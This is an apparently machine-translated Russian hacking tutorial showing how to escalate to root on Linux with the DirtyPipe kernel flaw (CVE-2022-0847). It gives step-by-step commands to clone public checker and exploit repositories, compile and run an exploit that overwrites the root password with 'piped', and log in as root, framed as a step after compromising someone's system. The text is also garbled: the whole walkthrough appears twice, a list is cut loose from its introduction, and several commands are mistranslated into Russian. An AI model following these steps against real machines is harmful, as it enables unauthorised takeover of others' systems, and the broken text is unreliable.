Добро пожаловать обратно, мои начинающие кибервоины!
Зачастую после успешного взлома системы мы ограничены привилегиями скомпрометированного пользователя. Обычные пользователи систем обычно имеют очень ограниченные привилегии и не могут получить доступ ко многим ресурсам или вносить изменения в свои системы и ресурсы (базы данных и т. д.). Это один из многих способов, которыми хорошие системные администраторы защищают свои сети.
Несмотря на ограниченные привилегии, обычных пользователей обычно легче скомпрометировать, чем системного администратора, поскольку они, как правило, менее осведомлены о безопасности. Они более подвержены мошенническим ссылкам и другим атакам с использованием социальной инженерии и часто используют слабые пароли. По всем этим причинам вероятность компрометации обычного пользователя с ограниченными привилегиями гораздо выше, чем системного администратора с правами root или системного администратора. Чтобы получить контроль над системами и сетью, вам потребуется повысить привилегии до уровня системного администратора или root в системах Linux. Существует множество методов повышения привилегий, включая:
DirtyPipe — это уязвимость локального повышения привилегий в ядре Linux, которая позволяет локальному злоумышленнику обойти ЛЮБЫЕ разрешения на доступ к файлам и записать произвольные данные в любой файл при определённых условиях. Это означает, что файлы, такие как /etc/shadow, где в системе хранятся хеши паролей, могут быть перезаписаны новым паролем.
Давайте протестируем эту потенциальную локальную уязвимость повышения привилегий в Kali 2021.
Мы знаем, что ядро Linux после версии 5.8 уязвимо, и эта уязвимость была исправлена в версии 5.16. Версию ядра Linux можно определить с помощью команды uname в Linux.
kali > uname -a
Как видите, эта версия Kali использует ядро Linux 5.10.0. Это может сделать её уязвимой к Dirty Pipe, поскольку этот релиз находится между первой уязвимой версией ядра и версиями с исправлениями! Для большей уверенности скачайте программу проверки DirtyPipe. Она доступна по адресу https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
kali > sudo git clone https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
Далее перейдите в новый каталог.
kali> cd CVE-2022-0847-dirty-pipe-checker
Теперь выполните скрипт dpipe.sh
kali > sudo dpipe.sh
Как вы можете видеть выше, эта проверка уязвимостей подтвердила, что это ядро Linux уязвимо для эксплойта повышения привилегий Dirty Pipe!
Сначала загрузите эксплойт;
kali > sudo git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
Далее перейдите в новый каталог.
Теперь, когда мы находимся в этом каталоге, давайте заглянем внутрь.
кали > ls -l
Как видите выше, есть два эксплойта и один скрипт компиляции. Чтобы использовать эти эксплойты, нам нужно запустить скрипт компиляции. Скрипт компиляции автоматически скомпилирует оба эксплойта.
кали > sudo ./compile.sh
После этого оба эксплойта станут зелеными и будут готовы к выполнению.
Давайте сначала запустим exploit-1.
кали> sudo ./exploit-1
Кажется, это сработало и изменило пароль root на «piped»!
кали> су корень
Далее введите новый пароль «piped».
После этого введите команду Linux whoami;
#ктоами
корень
Чтобы дополнительно убедиться, что у вас есть права root, попробуйте выполнить команду Linux id
#идентификатор
uid=0(корень) groups=0(корень), ……..
Успех! Теперь у вас есть права root в системе, и вы можете делать всё, что захотите!
Зачастую после успешного взлома системы мы ограничены привилегиями скомпрометированного пользователя. Обычные пользователи систем обычно имеют очень ограниченные привилегии и не могут получить доступ ко многим ресурсам или вносить изменения в свои системы и ресурсы (базы данных и т. д.). Это один из многих способов, которыми хорошие системные администраторы защищают свои сети.
- Эксплойты ядра
- Неправильные конфигурации SUID/SGID
- судо
- команды с экранированными символами
- Эксплойты сервисов
- Слабые права доступа к файлам
- Переменные среды
- Злоупотребление предполагаемой функциональностью
DirtyPipe — это уязвимость локального повышения привилегий в ядре Linux, которая позволяет локальному злоумышленнику обойти ЛЮБЫЕ разрешения на доступ к файлам и записать произвольные данные в любой файл при определённых условиях. Это означает, что файлы, такие как /etc/shadow, где в системе хранятся хеши паролей, могут быть перезаписаны новым паролем.
Давайте протестируем эту потенциальную локальную уязвимость повышения привилегий в Kali 2021.
Шаг №1: Проверка на уязвимость
Первый шаг — определить, уязвимо ли ваше ядро Linux к Dirty Pipe. В данном случае я использую Kali 2021.Мы знаем, что ядро Linux после версии 5.8 уязвимо, и эта уязвимость была исправлена в версии 5.16. Версию ядра Linux можно определить с помощью команды uname в Linux.
kali > uname -a
kali > sudo git clone https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
kali> cd CVE-2022-0847-dirty-pipe-checker
Теперь выполните скрипт dpipe.sh
kali > sudo dpipe.sh
Как вы можете видеть выше, эта проверка уязвимостей подтвердила, что это ядро Linux уязвимо для эксплойта повышения привилегий Dirty Pipe!
Шаг №2: Загрузите эксплойт
Теперь, когда мы знаем, что эта версия Linux уязвима, давайте попробуем воспользоваться ею, чтобы получить права root.Сначала загрузите эксплойт;
kali > sudo git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
Далее перейдите в новый каталог.
Теперь, когда мы находимся в этом каталоге, давайте заглянем внутрь.
кали > ls -l
кали > sudo ./compile.sh
Давайте сначала запустим exploit-1.
кали> sudo ./exploit-1
Кажется, это сработало и изменило пароль root на «piped»!
Шаг №3: Войдите в систему как пользователь root
Давайте теперь проверим, сможем ли мы войти в систему как root.кали> су корень
Далее введите новый пароль «piped».
После этого введите команду Linux whoami;
#ктоами
корень
#идентификатор
uid=0(корень) groups=0(корень), ……..
Успех! Теперь у вас есть права root в системе, и вы можете делать всё, что захотите!